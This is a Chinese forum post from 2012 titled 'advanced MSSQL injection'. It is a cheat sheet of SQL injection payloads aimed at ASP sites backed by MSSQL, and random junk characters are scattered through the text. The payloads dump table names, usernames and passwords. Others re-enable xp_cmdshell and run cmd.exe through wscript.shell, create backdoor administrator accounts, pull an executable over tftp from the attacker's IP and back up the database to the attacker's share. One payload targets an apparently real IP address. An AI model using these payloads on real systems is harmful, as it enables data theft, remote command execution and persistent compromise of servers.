标题: mssql高级注入 [打印本页] 作者: admin 时间: 2012-9-13 17:23 标题: mssql高级注入 最重要的表名: 7 e/ c5 A5 l( O9 l6 t2 h. Mselect * from sysobjects 8 [7 ?+ n4 J9 h& O b8 J1 ^( {$ ]sysobjects ncsysobjects * J" Y* Y1 W: h) ~" qsysindexes tsysindexes / p' S; @2 \7 `" f5 g: {( fsyscolumns S. N$ M% S, R0 J, R" C
systypes # P0 D1 m8 q! Y4 E. k2 fsysusers $ X+ }+ L; D0 n. Zsysdatabases8 `6 c: m8 c8 y0 u- s& ~0 L7 f0 D
sysxlogins , B! w( t; L- Qsysprocesses" v$ j: t" m% q6 h7 x9 X
4 D# S: B& ^% Q3 }- p9 K
最重要的一些用户名(默认sql数据库中存在着的)( `1 R9 M# K# p. L+ z0 E7 ?, W
public ( W7 o. b: N- h' A, ?dbo0 l8 H( N. i! u" u8 k7 | k1 @
guest(一般禁止,或者没权限)7 v+ I0 c5 ?% p" x0 s
db_sercurityadmin & b6 m+ W% G7 B8 e+ @8 }ab_dlladmin 3 v6 O b7 z# F7 e5 q6 }6 o: Z4 y8 i4 Z7 p, M% N
一些默认扩展) p0 ^$ n% p" d4 X0 M3 l# ~2 X3 M: i6 {
0 k+ D% o& Z- A z9 v1 F' @8 D
xp_regaddmultistring V5 b) Q$ `% I* D2 e; s) T- `xp_regdeletekey 9 q. K3 ^" C3 R5 |
xp_regdeletevalue ) t# S+ q* L1 H0 exp_regenumkeys , {/ b9 n! W1 H3 Yxp_regenumvalues + R0 D; r0 J5 P' p* Uxp_regread . ]& z L) A L6 l" O( a
xp_regremovemultistring & b9 L/ T* Q- s4 X4 Q$ H0 Qxp_regwrite ) c f$ d7 L+ {: H1 Z; |xp_availablemedia 驱动器相关0 d( O9 A" l9 E! _5 k6 N2 |) y
xp_dirtree 目录 5 v! F F( x, y( z& |1 oxp_enumdsn ODBC连接 8 \$ ]; h1 U) R; r- [. {! v% u" Yxp_loginconfig 服务器安全模式信息1 A5 `! ~4 o* g' D
xp_makecab 创建压缩卷 # m' M6 t. o+ w" R, [0 [xp_ntsec_enumdomains domain信息8 C8 `1 ?% D P, q: s& u2 x
xp_terminate_process 终端进程,给出一个PID $ y3 H' F/ B7 q ! H6 H/ l: v; L: w例如:3 [/ \$ ]2 F4 e; P' h
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll', F1 T4 q- ?% Q# c
exec xp_webserver # @. F/ b8 r4 ^2 A4 Q$ s# e' asp_dropextendedproc 'xp_webserver' Q; Z6 X5 s8 i% V* [* rbcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar " M @; ^- i/ M5 d+ z' group by users.id having 1=1-& [; Z+ i2 z5 w+ I
' group by users.id, users.username, users.password, users.privs having 1=1-. `! C& S+ t Q0 W+ R' |
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )- ; l! b/ U; h$ g+ H' z. E) } ! S8 o$ s$ I {# q) P* Aunion select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'- ( n L' k, }; V4 iunion select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-/ C, @; F$ }; _7 \
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')- % L* R) K. W, sunion select TOP 1 login_name FROM logintable- * u( a) Q: l6 J9 e7 @0 }union select TOP 1 password FROM logintable where login_name='Rahul'--! p1 l& c7 |) s6 V
构造语句:查询是否存在xp_cmdshell " s( ~, P* \; j: r# V- `5 T4 I K' union select @@version,1,1,1--* s/ Q. t# J; ~+ W% I( o# i- x
and 1=(select @@VERSION)& I5 m+ m/ U' R& E
and 'sa'=(select System_user) 6 ^, V0 p" V. D8 G M' union select ret,1,1,1 from foo--4 P5 C8 @! O8 }5 n7 U; ~, u
' union select min(username),1,1,1 from users where username > 'a'-" a! \. K; r# S% s b6 F1 i. {
' union select min(username),1,1,1 from users where username > 'admin'- 2 o( B+ b0 E7 s$ |! ^2 h# |/ y' union select password,1,1,1 from users where username = 'admin'-- 8 H1 N& a2 Z; ^& a, @; U E! a1 P
and user_name()='dbo' . r1 x4 ]- a( y1 ~" X2 B. band 0<>(select user_name()-3 Q/ D: j, h/ K0 Y9 z7 }
; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5245886 /add' . @3 a6 v Z/ H8 T4 Oand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') ) a& f5 `# j) W;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' ) J" Y9 {* C/ T4 P 2 h+ T; U2 n) D5 c+ e1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')# d7 b) T8 Y0 T R6 v, {; _
and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否 2 Q, X0 d8 @3 Fand 0<>(select top 1 paths from newtable)-- 暴库大法 * @0 h& ]3 D! M9 @; C6 v) t# h4 Qand 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)# S% h. t- r* X( w6 q& }
创建一个虚拟目录E盘:# x0 h8 s0 |, o! `$ ~& ]
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"' 8 v- O- G2 j6 l9 X; j0 I; U4 U: K访问属性:(配合写入一个webshell) / ?4 N7 t \$ Tdeclare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' / r |9 V# Z" o5 y- K3 T8 i7 O- f6 z: I: B2 o4 x
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 1 g$ R8 i: F7 q: h* l9 S依次提交 dbid = 7,8,9.... 得到更多的数据库名 & J( C: U1 V$ G) e4 }) y- C+ {and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 admin - D: Y8 D$ n. g' ~% l8 i7 ~/ E0 \& x6 i! Y! Y
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。* H u# D+ |' S6 K9 B
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' ' `0 h8 k5 |8 I
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id1 z! ~; ?4 |0 }5 _+ t
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id " T( X, c% \' zand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in " _3 K, M, x) p1 ]2 U9 D5 K
('id',...)) 来暴出其他的字段 0 e2 X/ U' H7 ?) ?* G5 S5 I- qand 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名 8 U9 g6 f: W: `6 v; \8 z' P6 ^依次可以得到密码。。。。。假设存在user_id username ,password 等字段 7 p; c2 ^# I0 g7 W6 d! S / O% W- ]& g8 u4 N, mShow.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin: d) V' V' x7 B$ a8 D4 ], P0 e' p/ c
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin" S4 v5 ^) o8 ~7 Q7 x) V
(union语句到处风靡啊,access也好用% V2 [& g" m( K. Q
; _: \/ X4 ^* f( E% O/ W$ L& |# V
暴库特殊技巧::%5c='\' 或者把/和\ 修改%5提交 F) _% ], R+ Z
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6); O* v; N0 O$ |$ V) g
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名 7 A) z* R" m3 fand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))8 \! s+ n) e: g5 ]5 @
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值 0 M0 R* }$ q$ q+ Band 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 % e7 R# f" g* ]5 [, E2 Q9 g+ G- l8 W9 C. a6 Z4 I6 z http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));-- % D9 w$ ^! |# o6 j7 A) I: Q8 Y* i
+ {# w$ s: Y8 k& u; E. { http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1 ) \6 ^* @" ]( _: U+ Y4 E$ q8 l! q
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)2 e# ?6 f$ @, Z$ R! \9 a6 p0 }
7 P" l2 j; Y* @# Q http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";-- 5 l, M9 s/ ] u; N5 q- P m
v' e- i4 \# o& x# {. {
得到了web路径d:\xxxx,接下来: , m+ b: n8 t9 s W2 ?0 f0 P( E) y http://xx.xx.xx.xx/111.asp?id=3400;use ku1;-- * e/ o+ }- l, i" ? http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);-- 1 Q( S. b/ ~8 \4 B1 V9 c
- a, i6 K0 m; Z0 Z# X+ K
传统的存在xp_cmdshell的测试过程: # Z7 y' C5 Z3 A4 X;exec master..xp_cmdshell 'dir'3 b% Z& Q# b! }2 A; o
;exec master.dbo.sp_addlogin hax;-- , p9 Y4 W* G4 R. `/ [$ Q: H;exec master.dbo.sp_password null,hax,hax;-- ! F/ w: V$ V, }- O- ^ {8 D;exec master.dbo.sp_addsrvrolemember hax sysadmin;-- , k' v6 {7 m& X& y, g
;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- , e: }; E" W( v4 w$ E& q- ~;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';-- $ y/ N7 w1 X+ W$ a0 u- B4 J
exec master..xp_servicecontrol 'start', 'schedule' $ v: t/ r% `* \" J' a; Dexec master..xp_servicecontrol 'start', 'server' $ v& f( l3 s) `4 W% Phttp://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5258 /add' ' O2 P7 k' N, {5 @1 ?" q( R Z
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administrators swap/add' : } b. V# r0 t* v" V! B& m ( f# I/ O1 F& {. rhttp://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'- 1 s! n; @, k. ~4 c m5 N$ I' q5 b( \
q% j$ R* R+ L1 h& mdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' ) S% S# I E+ q/ G! R C2 M
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\' % m- X' s' B$ B5 d. Q% u# a2 r9 I;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' 1 b$ l! c1 ~$ M. S. |& B" L c2 n如果被限制则可以。 " X. P( D& b: t `# H' ? Cselect * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax') " O/ k; z( i8 P, t0 k! X传统查询构造: / l; N2 f6 ^( i8 W3 H/ Uselect * FROM news where id=... AND topic=... AND .....3 b7 d. v9 o6 a7 p
admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>' " _: R- s; |9 S; d4 }select 123;-- % E( s) x% h& H+ ]% o2 i, V- a;use master;-- . x+ H' \- a8 W# O4 O& P:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。 % G* z/ w# M: W3 v; s& H'and 1<>(select count(email) from [user]);-- # F- h8 [3 t0 ]- z;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--( y8 I7 t# w6 A$ e" K
说明:" K( G6 j3 V% m" l8 j9 E
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。+ K! S/ r1 n2 l+ s: O$ P6 O) x
通过查看ffff的用户资料可得第一个用表叫ad2 z4 Y: D; V9 t2 e. u
然后根据表名ad得到这个表的ID8 i! A, U/ l, P. d
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';-- 8 w7 |' |* p/ j8 Z* ?" T% N: q6 ~+ O0 v" H. e" r
象下面这样就可以得到第二个表的名字了 / k h. s3 w6 Q* m- Rffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';-- 7 t, X0 z. S- Xffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';-- + k! K$ \+ G: @# m0 H) |ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--7 Y; v6 i: I: f* J( T: A6 |
$ V" [4 @$ m3 b& `; Z) y2 s
ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--) j2 p- |$ J0 P" X9 n, x. o